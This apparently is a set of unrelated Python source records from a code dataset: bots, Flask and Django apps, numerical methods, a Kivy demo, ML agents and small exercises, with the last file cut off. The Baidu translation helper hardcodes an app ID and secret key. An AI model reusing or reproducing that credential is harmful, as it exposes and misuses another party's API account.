schedule.every().day.at(\"18:00\").do(tweet)\n schedule.every().day.at(\"21:00\").do(tweet)\n schedule.every().day.at(\"00:00\").do(tweet)\n while True:\n schedule.run_pending()\n time.sleep(300)\n req = requests.get(\"https://www.milkboy-core-ai.tech\")\n print('successfully accessed' if req.status_code == requests.codes.ok else 'access failed')\n\n\ndef always():\n while True:\n auto_reply()\n\n\nAPI = Twitter(auth=get_auth())\nt = threading.Thread(target=daily)\nt2 = threading.Thread(target=always)\nt.start()\nt2.start()","sub_path":"config/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":9321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"3925556","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : weather_app.py\n# @Author: huifer\n# @Date : 2018/8/23\nfrom pyecharts_javascripthon.api import TRANSLATOR\nfrom flask import Flask, render_template\nfrom myVisual.wa import *\nfrom myVisual.weather import *\nfrom myVisual.my_map import *\n\napp = Flask(__name__)\n\nmy_weather = Weather(path=\"weather-heihe.xls\")\n\n\n@app.route(\"/year/\")\ndef year_with_month_line(year):\n # _bar = my_pie()\n _bar = my_weather.get_year_with_month_line(year=year)\n javascript_snippet = TRANSLATOR.translate(_bar.options)\n return render_template(\n \"pyecharts.html\",\n chart_id=_bar.chart_id,\n host=REMOTE_HOST,\n renderer=_bar.render_embed,\n my_width=\"100%\",\n my_height=600,\n custom_function=javascript_snippet.function_snippet,\n options=javascript_snippet.option_snippet,\n script_list=_bar.get_js_dependencies(),\n )\n\n\n@app.route(\"/allday/\")\ndef tmins_tmaxes_line(year):\n _bar = my_weather.get_tmins_tmaxes_line(year=year)\n javascript_snippet = TRANSLATOR.translate(_bar.options)\n return render_template(\n \"pyecharts.html\",\n chart_id=_bar.chart_id,\n host=REMOTE_HOST,\n renderer=_bar.render_embed,\n my_width=\"100%\",\n my_height=600,\n custom_function=javascript_snippet.function_snippet,\n options=javascript_snippet.option_snippet,\n script_list=_bar.get_js_dependencies(),\n )\n\n\n@app.route(\"/pm2_5/heatmap/\")\ndef pm2_5_show(heatmap):\n my_weather = Weather(path=\"aqi_ranking.json\")\n _bar = my_weather.get_pm_2_5_map(heatmap)\n javascript_snippet = TRANSLATOR.translate(_bar.options)\n return render_template(\n \"pyecharts.html\",\n chart_id=_bar.chart_id,\n host=REMOTE_HOST,\n renderer=_bar.render_embed,\n my_width=\"100%\",\n my_height=600,\n custom_function=javascript_snippet.function_snippet,\n options=javascript_snippet.option_snippet,\n script_list=_bar.get_js_dependencies(),\n )\n\n\nif __name__ == '__main__':\n REMOTE_HOST = \"https://pyecharts.github.io/assets/js\"\n app.run(\n port=8080,\n host='127.0.0.1',\n debug=True\n )\n","sub_path":"myVisual/api/weather_app.py","file_name":"weather_app.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"210606994","text":"from django.urls import include, path\nfrom rest_framework_nested import routers\nfrom justapp.views import StudentViewSet, SchoolViewSet, StudentSchoolViewSet\nfrom justapp.services import Service1\n\n# create router for schools and students endpoint\nrouter = routers.SimpleRouter()\nrouter.register(r'schools', SchoolViewSet)\nrouter.register(r'students', StudentViewSet)\n\n# register nested student-school endpoint\nschools_router = routers.NestedSimpleRouter(router, r'schools', lookup='school')\nschools_router.register(r'students', StudentSchoolViewSet, basename='student-school ')\n\n# assign url pattern from the routers\nurlpatterns = [\n path(r'', include(router.urls)),\n path(r'', include(schools_router.urls)),\n path('service1', Service1.call),\n]","sub_path":"src/django_main/django_main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"498736799","text":"from sympy import *\nimport numpy as np\nimport scipy.optimize as opt\n\n\n\ndef simpson_compuesto(f,a,b,n):\n if(n//2!=0):\n x = symbols('x')\n d_4 = diff(f, n=4)\n f_4 = -1 * abs(d_4)\n\n f=lambdify(x,f)\n f_4 = lambdify(x, f_4)\n d_4 = lambdify(x, d_4)\n\n\n vx=np.linspace(a,b,n)\n I=f(vx[0]+vx[n-1])\n h=(b-a)/(n-1)\n\n for i in range(1,(int((n/2)-1))):\n I+=2*f(vx[2*i])\n I+=4*f(vx[2*i-1])\n I=(I+4*f(vx[n-1]))*h/3\n beta = abs(d_4(opt.minimize_scalar(f_4, bounds=[a, b], method='bounded').x))\n\n error=beta*((b-a)*h**4)/180\n return (I,error)\n\n print(\"No se puede trabajar con un numero n par de puntos\")\n return None\n\nf='ln(x)'\n\na=2\nb=5\nn=239\n\nvalues=simpson_compuesto(f,a,b,n)\nif(values!=None):\n print(\"El valor aproximado es de \"+str(values[0])+\" con un error maximo de \"+str(values[1]))\n","sub_path":"Integracion Numerica/Regla de Simpson Compuesta/simpson compuesto por formula.py","file_name":"simpson compuesto por formula.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"13271621","text":"from random import sample\nfrom string import ascii_lowercase\n\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.properties import BooleanProperty\nfrom kivy.uix.behaviors import FocusBehavior\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.recycleboxlayout import RecycleBoxLayout\nfrom kivy.uix.recycleview.layout import LayoutSelectionBehavior\nfrom kivy.uix.recycleview.views import RecycleDataViewBehavior\nfrom kivy.uix.label import Label\nfrom kivy.uix.button import Button\n\nkv = \"\"\"\n:\n canvas.before:\n Color:\n rgba: (0.5, 0.5, 0.1, 0.3) if self.selected else (0, 0, 1, 1)\n Rectangle:\n pos: self.pos\n size: self.size\n Label:\n:\n canvas.before:\n Color:\n rgba: 0.5, 0.5, 0.5, 1\n Rectangle:\n size: self.size\n pos: self.pos\n value: ''\n Label:\n text: root.value\n\n:\n canvas:\n Color:\n rgba: 0.3, 0.3, 0.3, 1\n Rectangle:\n size: self.size\n pos: self.pos\n rv: rv\n orientation: 'vertical'\n GridLayout:\n cols: 3\n rows: 2\n size_hint_y: None\n height: dp(108)\n padding: dp(8)\n spacing: dp(16)\n Button:\n text: 'Populate list'\n on_press: root.populate()\n Button:\n text: 'Sort list'\n on_press: root.sort()\n Button:\n text: 'Clear list'\n on_press: root.clear()\n BoxLayout:\n spacing: dp(8)\n Button:\n text: 'Insert new item'\n on_press: root.insert(new_item_input.text)\n TextInput:\n id: new_item_input\n size_hint_x: 0.6\n hint_text: 'value'\n padding: dp(10), dp(10), 0, 0\n BoxLayout:\n spacing: dp(8)\n Button:\n text: 'Update first item'\n on_press: root.update(update_item_input.text)\n TextInput:\n id: update_item_input\n size_hint_x: 0.6\n hint_text: 'new value'\n padding: dp(10), dp(10), 0, 0\n Button:\n text: 'Remove first item'\n on_press: root.remove()\n\n RecycleView:\n id: rv\n scroll_type: ['bars', 'content']\n scroll_wheel_distance: dp(114)\n bar_width: dp(10)\n # viewclass: 'Row'\n viewclass: 'HolderItem'\n RecycleBoxLayout:\n default_size: None, dp(56)\n default_size_hint: 1, None\n size_hint_y: None\n height: self.minimum_height\n orientation: 'vertical'\n spacing: dp(2)\n\"\"\"\n\nBuilder.load_string(kv)\n\n\nclass TestButtonOne(Button):\n data = {}\n\n def set_data(self, data):\n self.data = data\n\n def on_press(self):\n print(self.data['value'])\n\n\nclass HolderItem(RecycleDataViewBehavior, GridLayout):\n index = None\n selected = BooleanProperty(False)\n selectable = BooleanProperty(False)\n cols = 3\n\n def __init__(self, **kwargs):\n print(\"HolderItem initialized, keyword args = %s\" % str(kwargs))\n super(HolderItem, self).__init__(**kwargs)\n self.myBtn1 = TestButtonOne(text=\"Button 1\")\n self.myBtn2 = Button(text='Button 2')\n self.add_widget(self.myBtn1)\n self.add_widget(self.myBtn2)\n self.flag = False\n\n def refresh_view_attrs(self, rv, index, data):\n print(\"HolderItem.refresh_view_attrs() called.\")\n\n if self.flag:\n for child in self.children:\n if child.id == \"myLabel\":\n self.remove_widget(child)\n else:\n self.flag = True\n\n myLabel = Label(text=data['value'], id=\"myLabel\")\n self.index = index\n self.myBtn1.set_data(data)\n # print(str(data['value']))\n self.add_widget(myLabel)\n\n return super(HolderItem, self).refresh_view_attrs(rv, index, data)\n\n\nclass Test(BoxLayout):\n\n def populate(self):\n self.rv.data = [{'value': ''.join(sample(ascii_lowercase, 6))}\n for x in range(50)]\n\n def sort(self):\n self.rv.data = sorted(self.rv.data, key=lambda x: x['value'])\n\n def clear(self):\n self.rv.data = []\n\n def insert(self, value):\n self.rv.data.insert(0, {'value': value or 'default value'})\n\n def update(self, value):\n if self.rv.data:\n self.rv.data[0]['value'] = value or 'default new value'\n self.rv.refresh_from_data()\n\n def remove(self):\n if self.rv.data:\n self.rv.data.pop(0)\n\n\nclass TestApp(App):\n def build(self):\n return Test()\n\n\nif __name__ == '__main__':\n TestApp().run()","sub_path":"scratch/RecycleViewExample.py","file_name":"RecycleViewExample.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"78670174","text":"\nTEST_STRINGS=['(())',\n '()()',\n '(((',\n '(()(()(',\n '))(((((',\n '())',\n '))(',\n ')))',\n ')())())',\n ')',\n '()())'\n ]\n\ndef floor_counter(string):\n \"\"\"\n Interprets the string and returns the resulting floor\n :param string: sting of parenthesis that encodes up and downs\n :return: the floor santa ends up on\n \"\"\"\n num_ups=sum(map(lambda x : 1 if '(' in x else 0, string))\n num_downs=sum(map(lambda x : 1 if ')' in x else 0, string))\n return num_ups-num_downs\n\ndef floor_finder(string, target_floor):\n \"\"\"\n finds the position in the string where santa first enters the floor in question\n :param string: string or parenthesis encoding up and downs\n :param target_floor: the target floor\n :return: the position in the string where santa first enters the target floor (starts at 1)\n \"\"\"\n curr_floor=0\n\n for index in range(0,len(string)):\n if string[index]=='(':\n curr_floor=curr_floor+1\n elif string[index]==')':\n curr_floor=curr_floor-1\n\n if curr_floor==target_floor:\n return index+1\n return -1#never reached the target floor\n\n\nif __name__==\"__main__\":\n #Part1:\n\n #Tests\n\n #Single String:\n \"\"\"floor_counter(TEST_STRINGS[0])\"\"\"\n\n #all tests\n \"\"\"for curr_string in TEST_STRINGS:\n print(\"{} results in {}\".format(curr_string,floor_counter(curr_string)))\n\"\"\"\n #Real Data\n with open(\"Day1_input.txt\",\"r\")as input_file:\n input_str=input_file.read()\n print(\"Floor {}\".format(floor_counter(input_str)))\n\n #part 2\n\n #tests\n floor_finder(\")\",-1)\n\n for curr_string in TEST_STRINGS:\n print(\"{} results in {}\".format(curr_string, floor_finder(curr_string,-1)))\n\n #real data\n floor_finder(input_str,-1)\n print(\"done\")","sub_path":"Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631440341","text":"age = input (\"Are you cigarette addict older than 75 years old? : (Yes/No)\").title().strip() == \"Yes\"\r\nchronic = input (\"Do you have a severe chronic disease? : (Yes/No)\").title().strip() == \"Yes\"\r\n\r\nimmune = input(\"Is your immune system too weak? : (Yes/No)\").title().strip() == \"Yes\"\r\n\r\nprint(\"age answer = \", age, \"\\nchronic answer = \", chronic, \"\\nimmune answer = \", immune)\r\n\r\nif age or chronic or immune :\r\n print(\"You are in the risky group\")\r\nelse :\r\n print(\"You are not in the risky group\")\r\n","sub_path":"assignment-2.py","file_name":"assignment-2.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"449183499","text":"#3.\tВ массиве случайных целых чисел поменять местами минимальный\n# и максимальный элементы.\nimport random\nK = 10\na = []\nfor i in range(K):\n a.append(random.randrange(K))\n\nmax_i = 0\nmin_i = 0\nmax = 0\nmin = K\n\nfor i, val in enumerate(a):\n if val > max:\n max_i = i\n max = val\n if val < min:\n min_i = i\n min = val\nprint(a)\na[min_i], a[max_i] = a[max_i], a[min_i]\nprint(a)\n","sub_path":"Lesson_3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595431766","text":"# -*- coding: utf-8 -*-\n\nimport http.client\nimport hashlib\nimport urllib\nimport random\n\ndef BTl(text,from_Lang = 'auto',go_Lang = 'zh'):\t\t# 参数(翻译文本,文本语言,翻译语言)\n\tdef md5(str):\n\t\tm = hashlib.md5(str.encode(encoding='utf-8'))\n\t\treturn m.hexdigest()\n\n\tappid = '20160223000013089'\n\tsecretKey = 'c85CO1I41ekgnmhKI5Ol'\n\n\n\thttpClient = None\n\tmyurl = '/api/trans/vip/translate'\n\tq = str(text)\n\tfromLang = str(from_Lang)\n\ttoLang = str(go_Lang)\n\tsalt = str(random.randint(32768, 65536))\n\n\tsign = md5(appid+q+salt+secretKey)\n\tmyurl = myurl+'?appid='+appid+'&q='+urllib.parse.quote(q)+'&from='+fromLang+'&to='+toLang+'&salt='+salt+'&sign='+sign\n\n\ttry:\n\t\thttpClient = http.client.HTTPConnection('api.fanyi.baidu.com')\n\t\thttpClient.request('GET', myurl)\n\n\t\t#response是HTTPResponse对象\n\t\tresponse = httpClient.getresponse()\n\t\tjson_text = response.read()\n\n\t\t#提取\n\t\ta = eval(json_text)\n\t\tb = eval(str(a['trans_result']))\n\t\tc = eval(str(b[0]))\n\t\tText = c['dst']\n\t\treturn Text\n\texcept Exception as e:\n\t\treturn e\n\tfinally:\n\t\tif httpClient:\n\t\t\thttpClient.close()\n","sub_path":"BaiduTranslate.py","file_name":"BaiduTranslate.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"120203805","text":"\n\nimport sklearn\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import cross_val_score\n#import matplotlib.pyplot as plt\n\nimport csv\nimport numpy as np\nimport pandas as pd\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, make_scorer, mean_squared_error\n\n# If true, include make and model in Random Forest\n# Shows how much make and model come into play, but when when we calculate prices\n# we should omit to see if the models are overpriced\nincludeMakeAndModel = True\n\n\n\ndef GetDataMatrix():\n \n # Data frame with make and model\n Xmodelmake = pd.read_csv(\"./data.csv\",header=0, usecols=(0,2,3,4,5,6,7,8,9,10,11,12,13,));\n Z=pd.read_csv(\"./data.csv\",header=0, usecols=(9,));\n X = Xmodelmake\n Y = pd.read_csv(\"./data.csv\",header=0, usecols=(14,));\n\n #X, Y, Xmodelmake = shuffle(X, Y, Xmodelmake)\n \n \n # Turns categorical data into binary values across many columns \n X = pd.get_dummies(X, dummy_na = False, columns=['Make', 'Engine Fuel Type', 'Transmission Type', 'Driven_Wheels', 'Vehicle Size', 'Vehicle Style'] );\n \n # Fill the null values with zeros\n X.fillna(-1, inplace=True);\n return (X, Y, Z,Xmodelmake)\n\n\n\n\n(X, Y,Z, Xmodelmake) = GetDataMatrix() #Gets the X,Y\n\n# Turn into a proper one D arrayY = numpy.ravel(Y);\nY_unraveled = np.ravel(Y);\n\n\npd.DataFrame(X).to_csv(\"car_fea.csv\")\n\n\npd.DataFrame(Y).to_csv(\"car_price.csv\")\n\nA=np.zeros((Z.shape[0],10))\nm1=\"Factory Tuner\"\nm2=\"Luxury\"\nm3=\"High-Performance\"\nm4=\"Performance\"\nm5=\"Flex Fuel\"\nm6=\"Hatchback\"\nm7=\"Diesel\"\nm8=\"Crossover\"\nm9=\"Exotic\"\nm10=\"Hybrid\"\ni=0\n\n\n\nZ = Z.values\nZ_new=Z.astype(str)\nprint(Z_new[0])\n\n\nprint(Z_new.dtype)\n\nfor i in range(Z_new.shape[0]) :\n #temp=Z_new[i]\n #print(\"hi:\",temp)\n #result = [x.strip() for x in Z_new[i].split(',')]\n result = np.char.split(Z_new[i], sep =',')\n #print(\"sddddd\",out_arr) \n #print(result[0])\n for j in range(len(result[0])):\n \n #print( m6==result[0][j])\n \n \n if result[0][j] == m1:\n A[i,0]=1\n print( m1==result[0][j])\n elif result[0][j] == m2:\n A[i,1]=1\n print( m2==result[0][j])\n elif result[0][j] == m3:\n A[i,2]=1\n print( m3==result[0][j])\n elif result[0][j] == m4:\n A[i,3]=1\n print( m4==result[0][j])\n elif result[0][j] == m5:\n A[i,4]=1\n print( m5==result[0][j])\n elif result[0][j] == m6:\n A[i,5]=1\n print( m6==result[0][j])\n elif result[0][j] == m7:\n A[i,6]=1\n print( m7==result[0][j])\n elif result[0][j] == m8:\n A[i,7]=1\n print( m8==result[0][j])\n elif result[0][j] == m9:\n A[i,8]=1\n print( m9==result[0][j])\n elif result[0][j] == m10:\n A[i,9]=1\n print( m10==result[0][j])\n elif result[0][j] == \"nan\":\n print( \"naaaaaaaaaaaaaaaaaan\") \n else:\n print(\"fucccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\")\n print(result[0][j])\n print(\"oooffffkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk\")\n \n \n\n\n#np.savetxt(\"carZ.csv\", Z, delimiter=\",\")\nnp.savetxt(\"carA.csv\", A, delimiter=\",\")","sub_path":"phone/cardata.py","file_name":"cardata.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"302237511","text":"from agents.base_agent import BaseAgent\n\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nclass DDPGAgent(BaseAgent):\n \"\"\"\n A DDPG agent implementation for continuous cases.\n \"\"\"\n\n def __init__(self, q_network, p_network, alpha, tau, q_lr, p_lr):\n self.q_network = q_network\n self.p_network = p_network\n self.alpha = alpha\n\n self.q_optim = tf.keras.optimizers.Adam(lr=q_lr)\n self.p_optim = tf.keras.optimizers.Adam(lr=p_lr, clipnorm=5.)\n\n self.target_q_network = tf.keras.models.clone_model(self.q_network)\n self.target_p_network = tf.keras.models.clone_model(self.p_network)\n\n self.target_q_network.set_weights(self.q_network.get_weights())\n self.target_p_network.set_weights(self.p_network.get_weights())\n\n self.tau = tau\n \n def __call__(self, x):\n \"\"\"\n Call the p-network to get action with given state.\n \"\"\"\n\n flatten = False\n if len(x.shape) == 1:\n x = np.array([x])\n flatten = True\n\n u = self.p_network.predict(tf.convert_to_tensor(x))\n if flatten:\n u = u.flatten()\n\n return u\n \n\n def train(self, exps):\n \"\"\"\n Train the network with given experiences.\n \"\"\"\n\n xs, us, cs, x_nexts, terminals = [], [], [], [], []\n for exp in exps:\n x, u, c, x_next, terminal = exp\n xs.append(x)\n us.append(u)\n cs.append(c)\n x_nexts.append(x_next)\n if terminal:\n terminals.append(1.0)\n else:\n terminals.append(0.0)\n \n xs = tf.convert_to_tensor(np.array(xs), dtype=tf.float32)\n us = tf.convert_to_tensor(np.array(us), dtype=tf.float32)\n cs = tf.convert_to_tensor(np.array(cs), dtype=tf.float32)\n x_nexts = tf.convert_to_tensor(np.array(x_nexts), dtype=tf.float32)\n terminals = tf.convert_to_tensor(np.array(terminals), dtype=tf.float32)\n\n ## update q-network\n with tf.GradientTape() as tape:\n # q = self.q_network(tf.concat([xs, us], 1))\n q = self.q_network([xs, us])\n q = tf.reshape(q, [-1])\n u_nexts = self.target_p_network(x_nexts)\n # q_= self.target_q_network(tf.concat([x_nexts, u_nexts], 1))\n q_= self.target_q_network([x_nexts, u_nexts])\n q_= tf.reshape(q_, [-1])\n q_target = cs + self.alpha * q_ * (1-terminals)\n\n L = tf.losses.MSE(q_target, q)\n\n q_grads = tape.gradient(L, self.q_network.trainable_weights)\n self.q_optim.apply_gradients(grads_and_vars=zip(q_grads, self.q_network.trainable_weights))\n\n ## update p-network\n with tf.GradientTape() as tape:\n # J = self.q_network(tf.concat([xs, self.p_network(xs)], 1))\n J = self.q_network([xs, self.p_network(xs)])\n J = tf.reduce_mean(J)\n \n p_grads = tape.gradient(J, self.p_network.trainable_weights)\n self.p_optim.apply_gradients(grads_and_vars=zip(p_grads, self.p_network.trainable_weights))\n\n ## update target networks\n self.update_target_networks()\n \n\n def update_target_networks(self):\n \"\"\"\n Update target networks.\n \"\"\"\n\n source_params = self.q_network.trainable_weights + self.p_network.trainable_weights\n target_params = self.target_q_network.trainable_weights+self.target_p_network.trainable_weights\n\n for target, source in zip(target_params, source_params):\n target.assign(target * (1-self.tau) + source * self.tau)\n\n\n def save(self, path, name):\n \"\"\"\n Save the networks to path.\n \"\"\"\n\n self.q_network.save(os.path.join(path, f\"{name}_q_network.h5\"))\n self.p_network.save(os.path.join(path, f\"{name}_p_network.h5\"))\n\n print(f\"Models are saved to {path}\")\n","sub_path":"Project/agents/ddpg_agent.py","file_name":"ddpg_agent.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"461029265","text":"import pygame\r\nfrom characters import Characters\r\n\r\nclass Hero(Characters):\r\n\r\n # Import Hero image\r\n hero_image = pygame.image.load(\"./images/hero.png\")\r\n\r\n # Initialize with the location of the hero\r\n def __init__(self, x, y):\r\n Characters.__init__(self, x, y, 0, 0)\r\n self.image = pygame.image.load(\"./images/hero.png\").convert_alpha()\r\n self.rect = self.image.get_rect()\r\n self.rect.center = self.x, self.y\r\n\r\n def hero_dead(self):\r\n self.dead = True\r\n font = pygame.font.Font(None, 60)\r\n text = font.render(\"HA! You Lose!\", True, (0, 0, 0))\r\n self.image = text\r\n self.x = 120\r\n self.y = 150\r\n self.dir_x = 0 \r\n self.dir_y = 0\r\n \r\n def hero_restart(self):\r\n self.image = pygame.image.load(\"./images/hero.png\").convert_alpha()\r\n self.x = 256\r\n self.y = 240\r\n self.dir_x = 0\r\n self.dir_y = 0\r\n self.dead = False","sub_path":"hero.py","file_name":"hero.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"151602759","text":"\"\"\"\n// Time Complexity : O(N)\n// Space Complexity : O(N)\n// Did this code successfully run on Leetcode : yes\n// Any problem you faced while coding this : no\n\"\"\"\nclass Solution(object):\n def longestPalindrome(self, s):\n hash = set()\n for c in s:\n if c not in hash:\n hash.add(c)\n else:\n hash.remove(c)\n # len(hash) is the number of the odd letters\n if len(s) > 0:\n return len(s) - len(hash) + 1\n else:\n return 0","sub_path":"Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"566162395","text":"import hashlib\n\nimport numpy as np\n\nfrom helper import load_housing_data\n\n\"\"\"\nPrepare test set and train set.\n\"\"\"\n\n\ndef split_training_set(data, test_radio):\n shuffled_indices = np.random.permutation(len(data))\n test_set_size = int(len(data) * test_radio)\n test_indices = shuffled_indices[:test_set_size]\n train_indices = shuffled_indices[test_set_size:]\n return data.iloc[train_indices], data.iloc[test_indices]\n\n\ndef test_set_check(identifier, test_ratio, hash):\n return hash(np.int64(identifier)).digest()[-1] < 256 * test_ratio\n\n\ndef split_train_test_by_id(data, test_ratio, id_column, hash=hashlib.md5):\n ids = data[id_column]\n in_test_set = ids.apply(lambda id_:test_set_check(id_, test_ratio, hash))\n return data.loc[~in_test_set], data.loc[in_test_set]\n\n\ndata = load_housing_data()\nhousing_with_id = data.reset_index()\ntrain_set, test_set = split_train_test_by_id(housing_with_id, 0.2, 'index')\nprint(len(train_set), len(test_set))\n","sub_path":"housing_price.py","file_name":"housing_price.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"293286961","text":"# coding: utf-8\n# refer to https://blog.csdn.net/zzzzjh/article/details/80633573\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport time\n\nclass GA(object):\n def __init__(self, x_range, fitness_function, pop_size, iteration_max, p_crossover, p_mutation, plot):\n self.bounds_begin = x_range[0] # lower bound\n self.bounds_end = x_range[1] # upper bound\n self.fitness_function = fitness_function\n self.bit_length = int(np.log2((self.bounds_end - self.bounds_begin) / 0.0001)) + 1 # the length of chromosome\n self.pop_size = pop_size\n self.iteration_max = iteration_max\n self.p_crossover = p_crossover\n self.p_mutation = p_mutation\n self.population = np.random.randint(0, 2, size = (self.pop_size, self.bit_length)) # initialize the population\n self.plot = plot\n\n # get the fitness value\n def fitness(self, population):\n fit_value = []\n cumsump = []\n for i in population:\n x = self.transform2to10(i)\n xx = self.bounds_begin + x * (self.bounds_end - self.bounds_begin) / (pow(2, self.bit_length) - 1)\n s = self.fitness_function(xx)\n fit_value.append(s)\n f_sum = sum(fit_value)\n every_population = [x / f_sum for x in fit_value]\n cumsump.append(every_population[0])\n every_population.remove(every_population[0])\n for j in every_population:\n p = cumsump[-1] + j\n cumsump.append(p)\n return cumsump\n\n # select two population to crossover\n def select(self, cumsump):\n seln = []\n for i in range(2):\n j = 1\n r = np.random.uniform(0, 1)\n prand = [x - r for x in cumsump]\n while prand[j] < 0:\n j = j + 1\n seln.append(j)\n return seln\n\n # crossover the population\n def crossover(self, seln, pc):\n d = self.population[seln[1]].copy()\n f = self.population[seln[0]].copy()\n r = np.random.uniform()\n if r < pc:\n c = np.random.randint(1, self.bit_length - 1)\n a = self.population[seln[1]][c:]\n b = self.population[seln[0]][c:]\n d[c:] = b\n f[c:] = a\n g = d\n h = f\n else:\n g = self.population[seln[1]]\n h = self.population[seln[0]]\n return g, h\n\n # mutation of the populations\n def mutation(self,scnew,p_mutation):\n r = np.random.uniform(0, 1)\n if r < p_mutation:\n v = np.random.randint(0, self.bit_length)\n scnew[v] = abs(scnew[v] - 1)\n else:\n scnew = scnew\n return scnew\n \n # convert the binary to decimal\n def transform2to10(self, population):\n x = 0\n n = self.bit_length\n p = population.copy()\n p = p.tolist()\n p.reverse()\n for j in range(n):\n x = x + p[j] * pow(2, j)\n return x\n\n\n def slover(self):\n scnew = []\n\n # decode the initial x\n decode_dna = self.transform2to10(self.population[0])\n curr_x = self.bounds_begin + decode_dna * (self.bounds_end - self.bounds_begin) / (pow(2, self.bit_length) - 1)\n print ('Init x: ', curr_x)\n\n cumsump = self.fitness(self.population)\n\n start_time = time.time()\n\n # use ga to find the minimum\n for i in range(self.iteration_max):\n for j in range(0, self.pop_size, 2):\n seln = self.select(cumsump) #return the selected order\n scro = self.crossover(seln, self.p_crossover) #returen two chromosome\n s1 = self.mutation(scro[0], self.p_mutation)\n s2 = self.mutation(scro[1], self.p_mutation)\n scnew.append(s1)\n scnew.append(s2)\n\n self.population = scnew\n cumsump = self.fitness(self.population)\n\n # decode the x\n x_list = []\n for dna in self.population:\n decode_dna = self.transform2to10(dna)\n curr_x = self.bounds_begin + decode_dna * (self.bounds_end - self.bounds_begin) / (pow(2, self.bit_length) - 1)\n x_list.append(curr_x)\n\n # get y from the decoded x\n y_list = []\n for curr_x in x_list:\n y_list.append(self.fitness_function(curr_x))\n\n # get the minimum\n fmin = y_list.index(min(y_list))\n x = x_list[fmin]\n\n x_list_in_gen = x_list[-(self.pop_size):]\n y_list_in_gen = y_list[-(self.pop_size):]\n\n if i % 100 == 0:\n print ('Current x: ', x)\n\n # show the animation\n if self.plot == True:\n scatter_best_x = x\n scatter_best_y = self.fitness_function(x)\n plt_x = plt.scatter(x_list_in_gen, y_list_in_gen, c = 'b')\n plt_best = plt.scatter(scatter_best_x, scatter_best_y, c = 'r')\n plt.pause(0.01)\n plt_x.remove()\n plt_best.remove()\n\n end_time = time.time() - start_time\n\n print('Optimal x: ', x)\n print('Computing time:', end_time)\n return x","sub_path":"ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"291780712","text":"\"\"\"\nExtract 1024-bit ECFP6 fingerprints for PRISM predicted structures\nfor clusters in a large set of complete bacterial genomes.\n\"\"\"\n\nimport json\nimport os\nimport pandas as pd\nfrom rdkit.Chem import AllChem\nfrom tqdm import tqdm\n\n# set directory \ngit_dir = os.path.expanduser(\"~/git/prism-4-paper\")\nos.chdir(git_dir)\n\n# import functions\nfrom functions import clean_mol, get_bit_vector\n\n# set up I/O tuples\nio = [# complete genomes\n [git_dir + \"/data/genomes/complete-genomes-NCBI-11282018-derep.txt\",\n git_dir + \"/data/genomes/prism_grid/output\",\n git_dir + \"/data/analysis/genomes/fingerprints_prism.csv\"],\n # metagenome-assembled genomes\n [git_dir + \"/data/genomes/PRJNA348753-genomes.txt\",\n git_dir + \"/data/MAGs/prism_lite/structure_pred\",\n git_dir + \"/data/analysis/MAGs/fingerprints_prism.csv\"]]\n## run #2: just get complete genomes\nio = [io[0]]\n\nfor io_tuple in io: \n print(\"analyzing I/O pair: \" + io_tuple[1])\n \n # read all genomes from file\n genomes = []\n derep_file = io_tuple[0]\n with open(derep_file) as f:\n lines = f.readlines()\n genomes = [line.strip('\\n').replace(\".gz\", \"\") for line in lines]\n \n # process each genome\n res = pd.DataFrame()\n for genome in tqdm(genomes):\n print(genome + \"...\")\n output_file = io_tuple[1] + \"/\" + genome + \".json\"\n if os.path.isfile(output_file) and os.path.getsize(output_file) > 0:\n f = open(output_file)\n root = json.load(f)\n prism = 